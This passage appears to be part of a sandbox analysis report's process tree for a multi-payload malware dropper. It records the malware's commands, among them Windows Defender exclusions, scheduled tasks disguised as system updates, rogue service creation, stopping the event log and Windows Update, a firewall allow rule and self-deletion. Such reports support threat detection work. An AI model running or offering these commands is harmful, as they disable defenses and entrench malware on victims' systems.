    C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 724
    3⤵
    - Program crash
    PID:3928
- C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe"
  2⤵
  PID:2576
- - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe"
    3⤵
    PID:756
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe" "--multiprocessing-fork" "parent_pid=756" "pipe_handle=700"
      4⤵
      PID:2744
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe" "--multiprocessing-fork" "parent_pid=756" "pipe_handle=684"
      4⤵
      PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe" "--multiprocessing-fork" "parent_pid=756" "pipe_handle=672"
      4⤵
      PID:2460
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im browser.exe"
        5⤵
        
        PID:4032
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im browser.exe
        6⤵
        Kills process with taskkill
        
        PID:3600
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe" "--multiprocessing-fork" "parent_pid=756" "pipe_handle=656"
      4⤵
      PID:5096
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im vivaldi.exe"
        5⤵
        
        PID:1088
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:3460
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2576_133510044065822127\test.exe" "--multiprocessing-fork" "parent_pid=756" "pipe_handle=652"
      4⤵
      PID:4632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:4728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3684
- C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 340
    3⤵
    - Program crash
    PID:5104
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"
  2⤵
  PID:2732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 860
    3⤵
    - Program crash
    PID:1396
- C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe"
  2⤵
  PID:4080
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp1.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3404
- - C:\Windows\SysWOW64\SubDir\asg.exe
    "C:\Windows\SysWOW64\SubDir\asg.exe"
    3⤵
    PID:2644
- C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
  2⤵
  PID:4992
- - C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
    3⤵
    PID:4868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 980
      4⤵
      Program crash
      PID:2024
- C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe"
  2⤵
  PID:1364
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:2064
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:1484
- C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
  2⤵
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
    3⤵
    PID:1088
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
      4⤵
      PID:5012
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:1172
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:756
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Executes dropped EXE
        
        PID:4872
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:1556
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:3220
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk6942" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:3936
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk2744" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk3342" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:4632
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk3094" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:5724
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:5932
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:5640
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2188
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:5568
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:5012
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:5356
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:1344
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2480
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:5860
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:6044
- C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe"
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN buildcosta.exe /TR "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4212
- - C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    PID:3096
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 372
      4⤵
      Program crash
      PID:3180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 388
      4⤵
      Program crash
      PID:3184
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 392
      4⤵
      Program crash
      PID:4672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 696
      4⤵
      Program crash
      PID:4572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 732
      4⤵
      Program crash
      PID:4300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 432
      4⤵
      Program crash
      PID:2520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 752
      4⤵
      Program crash
      PID:756
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 760
      4⤵
      Program crash
      PID:1376
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 752
      4⤵
      Program crash
      PID:5468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 728
      4⤵
      Program crash
      PID:5716
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 776
      4⤵
      Program crash
      PID:5992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 720
      4⤵
      Program crash
      PID:6116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 776
      4⤵
      Program crash
      Suspicious use of WriteProcessMemory
      PID:3960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 840
      4⤵
      Program crash
      PID:4552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 664
      4⤵
      Program crash
      PID:1532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 924
      4⤵
      Program crash
      PID:5272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 916
      4⤵
      Program crash
      PID:4108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 436
      4⤵
      Program crash
      PID:3644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 904
      4⤵
      Program crash
      PID:4732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5392
  - - C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe
      "C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
      4⤵
      PID:5320
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 340
        5⤵
        Program crash
        
        PID:2576
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 356
        5⤵
        Program crash
        
        PID:5096
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 360
        5⤵
        Program crash
        
        PID:5296
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 652
        5⤵
        Program crash
        
        PID:5480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 688
        5⤵
        Program crash
        
        PID:5576
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 688
        5⤵
        Program crash
        
        PID:3912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 688
        5⤵
        Program crash
        
        PID:4636
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 744
        5⤵
        Program crash
        
        PID:3620
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 716
        5⤵
        Program crash
        
        PID:2564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5156
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 592
        5⤵
        Program crash
        
        PID:3028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 604
        5⤵
        Program crash
        
        PID:5784
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 876
        5⤵
        Program crash
        
        PID:3028
- - C:\Users\Admin\AppData\Local\Temp\1000121001\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000121001\toolspub1.exe"
    3⤵
    PID:4588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 340
      4⤵
      Program crash
      PID:1476
- - C:\Users\Admin\AppData\Local\Temp\1000122001\rty27.exe
    "C:\Users\Admin\AppData\Local\Temp\1000122001\rty27.exe"
    3⤵
    PID:4100
- - C:\Users\Admin\AppData\Local\Temp\1000123001\FirstZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1000123001\FirstZ.exe"
    3⤵
    PID:5656
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:400
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4380
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1656
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3108
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:184
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5200
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5944
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:1184
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:216
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:400
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:5840
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:2164
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1800
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:1336
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Executes dropped EXE
        
        PID:1092
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3328
- C:\Users\Admin\AppData\Local\Temp\Files\lololoolll.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lololoolll.exe"
  2⤵
  PID:5052
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 1200
      4⤵
      Program crash
      PID:2060
- C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
  2⤵
  PID:1660
- - C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe
    "C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe"
    3⤵
    PID:1716
- - C:\Users\Admin\AppData\Local\Temp\visual-c++.exe
    "C:\Users\Admin\AppData\Local\Temp\visual-c++.exe"
    3⤵
    PID:4728
- C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
  2⤵
  PID:3860
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3636
- C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"
  2⤵
  PID:1468
- C:\Users\Admin\AppData\Local\Temp\Files\amers.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amers.exe"
  2⤵
  PID:5436
- - C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
    "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:5828
  - - C:\Users\Admin\AppData\Local\Temp\1000674001\plata.exe
      "C:\Users\Admin\AppData\Local\Temp\1000674001\plata.exe"
      4⤵
      PID:6080
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2296
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:4396
    - - C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\0JkaV6niHi_GoqhPSmbi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\0JkaV6niHi_GoqhPSmbi.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3592
    - - C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\XCYWZpr8KUdxG6ZfwEHe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\XCYWZpr8KUdxG6ZfwEHe.exe"
        5⤵
        
        PID:756
    - - C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\kAFZS8MHXWJOKyrxlKmZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jobA4D3N7QBuoO_HNj\kAFZS8MHXWJOKyrxlKmZ.exe"
        5⤵
        
        PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\1000719001\redline1234.exe
      "C:\Users\Admin\AppData\Local\Temp\1000719001\redline1234.exe"
      4⤵
      PID:2776
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "ACULXOBT"
        5⤵
        Launches sc.exe
        
        PID:1720
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1456
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "ACULXOBT"
        5⤵
        Launches sc.exe
        
        PID:1660
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\1000720001\moto.exe
      "C:\Users\Admin\AppData\Local\Temp\1000720001\moto.exe"
      4⤵
      PID:5632
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "FLWCUERA"
        5⤵
        Launches sc.exe
        
        PID:5960
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:3592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000720001\moto.exe"
        5⤵
        
        PID:4120
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:5628
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "FLWCUERA"
        5⤵
        Launches sc.exe
        
        PID:400
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\1000721001\2024.exe
      "C:\Users\Admin\AppData\Local\Temp\1000721001\2024.exe"
      4⤵
      PID:5864
  - - C:\Users\Admin\AppData\Local\Temp\1000722001\latestroc.exe
      "C:\Users\Admin\AppData\Local\Temp\1000722001\latestroc.exe"
      4⤵
      PID:3940
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1496
        5⤵
        Program crash
        
        PID:1072
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      PID:3412
  - - C:\Users\Admin\AppData\Local\Temp\1000723001\MRK.exe
      "C:\Users\Admin\AppData\Local\Temp\1000723001\MRK.exe"
      4⤵
      PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\1000725001\alex.exe
      "C:\Users\Admin\AppData\Local\Temp\1000725001\alex.exe"
      4⤵
      PID:5672
  - - C:\Users\Admin\AppData\Local\Temp\1000726001\sadsadsadsa.exe
      "C:\Users\Admin\AppData\Local\Temp\1000726001\sadsadsadsa.exe"
      4⤵
      PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\1000727001\fsdfsfsfs.exe
      "C:\Users\Admin\AppData\Local\Temp\1000727001\fsdfsfsfs.exe"
      4⤵
      PID:4612
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:568
  - - C:\Users\Admin\AppData\Local\Temp\1000728001\leg221.exe
      "C:\Users\Admin\AppData\Local\Temp\1000728001\leg221.exe"
      4⤵
      PID:4600
    - - C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
        5⤵
        
        PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\1000729001\rdxx1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000729001\rdxx1.exe"
      4⤵
      PID:948
  - - C:\Users\Admin\AppData\Local\Temp\1000730001\crypted.exe
      "C:\Users\Admin\AppData\Local\Temp\1000730001\crypted.exe"
      4⤵
      PID:4500
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\1000731001\moto.exe
      "C:\Users\Admin\AppData\Local\Temp\1000731001\moto.exe"
      4⤵
      PID:4740
- C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"
  2⤵
  PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "
    3⤵
    PID:5792
  - - C:\Users\Admin\AppData\Local\Temp\Files\Users.exe
      users.exe
      4⤵
      PID:3544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "
        5⤵
        
        PID:3228
      - C:\Windows\SysWOW64\chcp.com
        
        CHCP 1251
        6⤵
        
